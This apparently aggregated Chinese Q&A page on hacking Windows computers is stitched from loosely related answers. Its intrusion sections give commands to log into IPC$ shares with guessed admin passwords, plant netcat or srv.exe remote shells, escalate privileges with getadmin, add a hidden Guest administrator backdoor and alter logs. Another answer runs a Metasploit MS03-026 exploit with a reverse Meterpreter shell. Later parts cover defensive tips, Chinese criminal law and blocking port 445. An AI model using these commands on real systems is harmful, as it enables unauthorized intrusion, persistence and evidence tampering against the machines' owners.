怎么入侵win10系统的电脑

怎么入侵win10

1.入侵电脑的方法,尽可能多的方法

IPC入侵攻略！其实针对IPC漏洞入侵的方法目前已经有很多的教程，但是其中很多教程并不完整，所以还是有很多网友来信问我关于IPC漏洞入侵的有关问题，这就是我写这篇文章的原因了。

如果你觉得本文也不完整，那只好去找更好的版本了，但是我希望你能把你的意见和建议告诉我，让我不断的完善这篇文章。本文参考了小榕的流光2000说明文档及其它相关文档，也包含了一些自己的心得体会。

本文欢迎非商业性转载，但请保持文章完整性并注明出处！：-） IPC是Internet Process Connection的缩写，也就是远程网络连接。它是Windows NT及Windows 2000特有的一项功能，特点是在同一时间内，两个IP之间只允许建立一个连接。

好了，废话少说，现在进入主题。如何找到具有IPC漏洞的主机呢？以前我都是组合一个国外的扫描工具（名字我忘了）和KillUSA的LetMeIn，因为很多工作都是手工完成的，所以速度可想而知了。

现在因为有了小榕的流光2000，所以找到这样的主机实在是太简单了，具体操作我就不说了，大家可以参考该软件的说明文档。好了，假设我们已经找到了一台这样的主机，地址是139.223.200.xxx，管理员帐号是Administrator，密码是123456。

进入命令行方式，正式开工。需要说明的是，以下操作都是在目标主机没有禁止远程IPC$连接和启动Schedule服务的理想情况下进行的。

F：\》net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator" 命令成功完成。 F：\》copy nc.exe \\139.223.200.xxx\admin$ 已复制 1 个文件。

F：\》net time \\139.223.200.xxx \\139.223.200.xxx 的当前时间是 2000/12/25 上午 10:25 在 \\139.223.200.xxx 的本地时间（GMT - 07:00）是 2000/12/25 上午10:35 命令成功完成。 F：\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe 新增加了一项作业，其作业 ID = 0 F：\》telnet 139.223.200.xxx 1234 上面的命令很简单，你只要参考一下net,at和nc的用法就可以了。

这样，我们就登上了远程的主机。最理想的情况是这样的，但是，也许你会遇到目标主机的Schedule服务没有启动的情况，那么，at命令就不能用了，我们就需要增加以下步骤。

F：\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe 服务仍未启动。 F：\》netsvc \\139.223.200.xxx schedule /start Service is running on \\139.223.200.xxx 登上远程主机之后，我们可以做什么呢？这要视这个帐号的权限以及该主机的安全策略来决定。

如果你的权限不够的话，可以试试下面的步骤。首先在本地执行下面的命令。

F：\》copy getadmin.exe \\139.223.200.xxx\admin$ 已复制 1 个文件。 F：\》copy gasys.dll \\139.223.200.xxx\admin$ 已复制 1 个文件。

其次，在远程主机运行下面的命令。 C:\WINNT\system32》getadmin 如果成功的话，你就是这台主机的管理员了，权限够大了吧？：-）那么，现在我们能做什么呢？改主页？下载SAM数据库？都可以啦！方法有很多，我就不一一说了，具体方法可以参考相关教程。

我一般对目标主机上的WORD文档和数据库比较感兴趣，呵呵。

其实，如果你在这台机子上面放个木马或者病毒什么的东东，做起事来更容易一些，但是我觉得如果你跟他没什么深仇大恨的话，还是不要这么做了，这样不好。

作完了你要做的事，不要忘了做个后门。 C:\WINNT\system32》net user Guest 30906766 net use Guest 30906766 The command completed successfully. C:\WINNT\system32》net localgroup administrators Guest /add net localgroup administrators Guest /add The command completed successfully. 这是个比较简单的后门，要想做的更好一些，可以象Linux那样，做出一套RootKits来，其实这样的东东目前已经有了，你只要拿来用就可以了。

现在搞破坏真是简单多了，那么多的傻瓜工具任你用，哎！要想自保，不学点安全知识怎么行呢？最后，我们得修理一下日志。虽然Redp0wer告诉我很少管理员会看NT的日志，但是我想修理一下还是有用的。

NT的日志在什么地方呢？可以参考XUDI的文章。但是有一点要记住的是，日志只能修改，不能删除，否则就是自己把自己出卖了！：-）这方面的命令行工具也不少，你可以到一些国外的站点去看看。

2.怎么入侵一台电脑

1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址（空口令？哇，运气好到家了），如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2. C:\>copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。3. C:\>net time \\127.0.0.1 查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe 用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）5. C:\>net time \\127.0.0.1 再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。6. C:\>telnet 127.0.0.1 99 这里会用到Telnet命令吧，注意端口是99。

Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:\WINNT\system32>ntlm 输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。

然后使用"net start telnet"来开启Telnet服务！9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！（然后你想做什么？想做什么就做什么吧，哈哈）为了以防万一，我们再把guest激活加到管理组10. C:\>net user guest /active:yes 将对方的Guest用户激活11. C:\>net user guest 1234 将Guest的密码改为1234，或者你要设定的密码12. C:\>net localgroup administrators guest /add 将Guest变为Administrator^_^（如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机）从IP入侵别人电脑黑客从IP入侵别人电脑新绝招知道对方IP入侵别人的电脑黑客已经成为一种文化，很多人想成为黑客，他们偶尔学到了几种小花招，总喜欢拿别人开玩笑，搞些恶作剧。其实黑客的最高境界在于防守，不在于进攻。

所谓明枪易躲暗箭难防，要防住他人所有的进攻，肯定需要懂得比对方更多的系统知识，了解更多的系统漏洞，及如何弥补漏洞。现在满天都是黑客教程，但真正有用的不多，下面介绍一种WIN9X下的入侵方法： 1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。

2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称第二行是对方电脑所在工作组第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。

以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。对付上面进攻的最好办法就是隐藏你的IP地址。

3.黑客都有那些入侵电脑方法

我们自然先来看看“黑客”常用的攻击方法。

“黑客”的攻击方法可以是你所接触到的任何东西：从键盘到硬盘，从诈骗到轰炸。下面我们就逐一列举这些问题。

1. 键盘是不是感觉到很奇怪，为什么把键盘放在第一位呢？键盘也会遭到攻击吗？很简单，键盘是我们与外界进行沟通的重要桥梁，我们要通过它输入大量的信息，所以许多“黑客”软件都把这只“黑暗中的眼睛”放在了这里。通过记录键盘的活动，可以很容易地得到很多有价值的东西，例如密码、谈话内容。

解决办法：对付这些东西，最好的办法还是使用杀毒软件。如果杀毒软件带有病毒防火墙，需要注意下载最新的防火墙的版本。

2.浏览器我们上网肯定离不开浏览器，这也是泄漏秘密的“好地方”。浏览器的漏洞主要是IE缓存的问题以及cookie的问题，尤其是cookie，有的cookie里面包含了你的登录网站名称、登录时间甚至登录密码。

“踏雪无痕”这类软件就是专门查看cookie的“黑客”软件。解决办法：点“internet选项”、“删除文件”把缓存彻底删除掉. 3. 腾讯OICQ. 现在哪家网吧会把腾讯OICQ拒之门外呢？正因为腾讯OICQ的广泛使用，腾讯OICQ每一个新版本的发布都受到众多的“黑客”的关注。

从嗅探器、键盘记录器、轰炸器到偷看聊天记录等攻击方式，让人防不胜防。解决办法：腾讯OICQ的更新速度非常快，所以要注意下载使用最新版本；在OICQ中点“系统参数”、“网络安全设置”、“拒绝陌生人信息”就可以对付OICQ的轰炸；还应该设置“使用本地信息加密”。

4. 网页浏览浏览网页是我们获取网上信息的重要方法之一，对于网页浏览需要注意以下几点：登录免费信箱的时候尽量到指定的网站上去登录，不要在个人主页上登录，因为该网站很可能会记录下你的用户名和口令。对付无限制弹出窗口的网页（这是网页浏览时的恶作剧，可以让你的机器死机），可以先按住“Crtl+Alt+Del”键，把“EXPLORER”窗口关闭，然后再修改“Internet”选项，禁止执行Java。

对于网页中插入的ActiveX，当提示下载安装的时候一定要看清除是否签名，如果没有签名就存在包含木马的可能性。尽量到知名的下载网站去下载软件，对下载的软件最好先杀毒。

5. 硬盘共享网吧等于一个局域网，所以对于网络硬盘的共享一定要注意，尤其是硬盘的写权限千万开不得。最好把所有的硬盘全部设置为不共享。

6. 拷贝粘贴我们有时候会大量地使用拷贝粘贴功能来复制文件和文字。当离开机器的时候最好把剪贴板清空，尤其要注意是否使用了某些剪贴板增强工具，这些工具通常会自动记录你所拷贝的文件数量和内容，即便是非正常关机都不会消失。

7.遗留文件不要随便打开别人遗留下来的文件。好奇心并非总是好事。

“黑客”为了使普通用户去掉戒备之心，总是利用大家最常见或者喜好的东西来骗人上当。一个图标是WINZIP的文件实际上却可能是一个木马；一款漂亮的FLASH动画背后可能隐藏了许多不为人所知的“勾当”。

8.异常变化最后，注意计算机的异常变化。当你正在聊天的时候，突然鼠标不听你指挥了，或者计算机突然重新启动了，又或者突然出现一个新的窗口等，这些迹象表明你使用的计算机遭到了别人的控制。

最好的防范办法，是下载天网个人防火墙，切断与网络的连接，天网同时也会自动记录下入侵者的IP。 9.端口你在网络上冲浪，别人和你聊天，你发电子邮件，必须要有共同的协议，这个协议就是TCP/IP协议，任何网络软件的通讯都基于TCP/IP协议。

如果把互联网比作公路网，电脑就是路边的房屋，房屋要有门你才可以进出，TCP/IP协议规定，电脑可以有256乘以256扇门，即从0到65535号“门”，TCP/IP协议把它叫作“端口”。当你发电子邮件的时候，E-mail软件把信件送到了邮件服务器的25号端口，当你收信的时候，E-mail软件是从邮件服务器的110号端口这扇门进去取信的，你现在看到的我写的东西，是进入服务器的80端口。

新安装好的个人电脑打开的端口号是139端口，你上网的时候，就是通过这个端口与外界联系的。黑客不是神仙，他也是通过端口进入你的电脑. 黑客是怎么样进入你的电脑的呢？当然也是基于TCP/IP协议通过某个端口进入你的个人电脑的。

如果你的电脑设置了共享目录，那么黑客就可以通过139端口进入你的电脑，注意！WINDOWS有个缺陷，就算你的共享目录设置了多少长的密码，几秒钟时间就可以进入你的电脑，所以，你最好不要设置共享目录，不允许别人浏览你的电脑上的资料。除了139端口以外，如果没有别的端口是开放的，黑客就不能入侵你的个人电脑。

那么黑客是怎么样才会进到你的电脑中来的呢？答案是通过特洛伊木马进入你的电脑。如果你不小心运行了特洛伊木马，你的电脑的某个端口就会开放，黑客就通过这个端口进入你的电脑。

举个例子，有一种典型的木马软件，叫做netspy.exe。如果你不小心运行了netspy.exe，那么它就会告诉WINDOWS，以后每次开电脑的时候都要运行它，然后，netspy.exe又在你的电脑上开了一扇“门”，“门”的编号是7306端口，如果黑客知道你的7306端口是开放的话，就可以用软件偷偷进入到你的电脑。

4.怎么入侵电脑

入侵电脑可能涉嫌“破坏计算机信息系统罪”

以下是《刑法》中关于“破坏计算机信息系统罪”的构成要件和量刑。

(2)构成要件

刑法第286条规定的破坏计算机信息系统罪，是指违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常进行；或者对计算机系统存储、处理或者传输的数据进行删除、修改、增加的操作；或者故意制作、传播计算机病毒等破坏性程序，影响计算机和应用程序系统正常运行，后果严重的行为。

本罪的构成要件是：

第一，侵犯的客体，是计算机信息系统的正常运行秩序。

第二，在客观方面，表现为：一是实施了下列3种行为中的一种或者多种：违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰；或者对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作；或者故意制作、传播计算机病毒的破坏性程序。二是造成了计算机系统不能正常运行，后果严重的危害结果。

第三，本罪的主体是一般主体。

第四，主观方面是故意。

(3)要注意划清本罪的罪与非罪、此罪与彼罪的界限

第一，要划清本罪的罪与非罪的界限。在本罪中，“后果严重”，是构成本罪的要件。这主要是严重影响计算机系统正常运行；影响计算机系统正常运行造成严重经济损失；影响计算机系统正常运行造成其他严重后果。

第二，要划清本罪与刑法第285条规定的非法侵入计算机信息系统罪的界限。这两者的区别是：一是在客观方面，本罪表现为对计算机信息系统进行非法操作，例如删除、修改、增加等等；而侵入计算机信息系统罪则单纯表现为侵入行为。二是从刑法理论上看，本罪表现为“结果犯”；而侵入计算机信息系统罪表现为“行为犯”

(4)刑罚及量刑幅度

根据刑法第286条规定，犯本罪的，判处5年以下有期徒刑或者拘役；后果特别严重的，判处5年以上有期徒刑

5.您好,我想请教一下如何入侵windows服务器呢

简单的nmap攻击（默认服务器开启135端口）先用上述nmap扫描目标主机信息，然后进入命令行

msfconsole

search ms03-026-dcom

use exploit/windows/dcerpc/ms03_026_dcom/

set PAYLOAD windows/meterpreter/reverse_tcp（选择工具）

set RHOST 192.168.1.10 //目标主机

set LHOST 192.168.1.11 //操作主机

exploit 执行命令

shell 得到目标shell，基本可以为所欲为了

6.win10会被黑客攻击吗

个人电脑由于入侵价值普遍偏低，所以一般黑客会攻击服务器，那样会更容易获取利益。但个人电脑也不排除被黑客恶意攻击的可能性。其实电脑系统并不会让黑客攻击的可能性改变，而是在电脑的安全性上有所体现。并且，个人电脑被入侵的主要方式是木马和病毒，一般不会有黑客专门入侵个人电脑。

Windows10系统如果坚持更新到最新版本的话几乎是不用担心黑客入侵。其实个人电脑一般情况下本便比服务器更难以入侵。再加上Window10自带的安全软件，对于黑客入侵是无需担忧的。

不过个人认为，Windows10上的安全软件有些不尽人意。答主可以考虑使用一些免费、付费的杀毒软件。诸如腾讯的电脑管家、360安全卫士之类的。但国产的免费杀毒软件几乎都有些广告满天飞，软件捆版的问题。在这里我推荐火绒。火绒虽然可能算不上国产骄傲，但国产良心是确实的。这个可以又自己的使用感受得出，我就不再赘言了。

愿各位能无忧地使用电脑，不要相信某某漏洞刷某某的广告！

7.怎么把自己电脑的win10给人家

前提条件是对方必须得要开启电脑的远程控制，否则计算机就连接不上

远程用户的两台电脑都得在局域网或广域网之中。

win10远程控制开启方法如下：

1、首先右击桌面的此电脑，单击属性，选择左边的“远程设置”

2、然后在远程的选项卡中单击选择“允许远程协助连接这台计算机”，然后再单击选择“允许远程连接到此计算机“

3、之后选择添加需要远程的用户，单击”选择用户“进入远程桌面用户页面之后，单击添加按钮添加远程控制的计算机用户名，点击确定，再点应用，再点确定即可

8.勒索病毒容易入侵win10哪些端口

大部分系统均起作用，win10也不例外，但win10的安全度比较高，比较安全！此次永恒之蓝勒索病毒事件大部分被入侵的都是低级系统，微软已经不提供安全更新的系统。

如果可以建议使用win10比较安全！但主要是要自己做好防御措施防御方法：1.不随意打开/点击/进入/下载安装不明网页/链接/网页/软件等（这是最基础的）2.更新安全软件至最新版本，专门应对此次事件的最新版本，要可靠的安全软件（推荐用360安全卫士）3.到微软官网下载最新补丁，或是用360下载最新的补丁！4.这段时间最好每天都木马查杀，漏洞检测。5.也是很重要的一点，把445端口（最重要的），135,137,138,139等危险端口都封闭，关闭方法自己百度，随便一查就会有（最好选择最近的发布文章）6.使用360反勒索服务7.准备好一块系统重装光盘或U盘，以防万一。

8.也要准备好360新更新的工具文件解密也是以防万一。9.这一点是最重要，最重要，最重要的，那就是防火墙必须要开，（是必须开，而不是可以开，也不是推荐开），不然即使你申请360反勒索赔理，他也绝对不会赔给你的10.如果不闲麻烦可以开机时断掉网线，开机用杀毒软件检查无异常后在重新连网。

9.勒索病毒容易入侵win10哪些端口

网络安全专家建议，用户要断网开机，即先拔掉网线再开机，这样基本可以避免被勒索软件感染。开机后应尽快想办法打上安全补丁，或安装各家网络安全公司针对此事推出的防御工具，才可以联网。建议尽快备份电脑中的重要文件资料到移动硬盘、U 盘，备份完后脱机保存该磁盘，同时对于不明链接、文件和邮件要提高警惕，加强防范。

临时解决方案：

1、开启系统防火墙

2、利用系统防火墙高级设置阻止向445端口进行连接（该操作会影响使用445端口的服务）

3、打开系统自动更新，并检测更新进行安装

Win7、Win8、Win10的处理流程

1、打开控制面板-系统与安全-Windows防火墙，点击左侧启动或关闭Windows防火墙。

2、选择启动防火墙，并点击确定

3、点击高级设置

4、点击入站规则，新建规则

5、选择端口，下一步

6、特定本地端口，输入445，下一步

7、选择阻止连接，下一步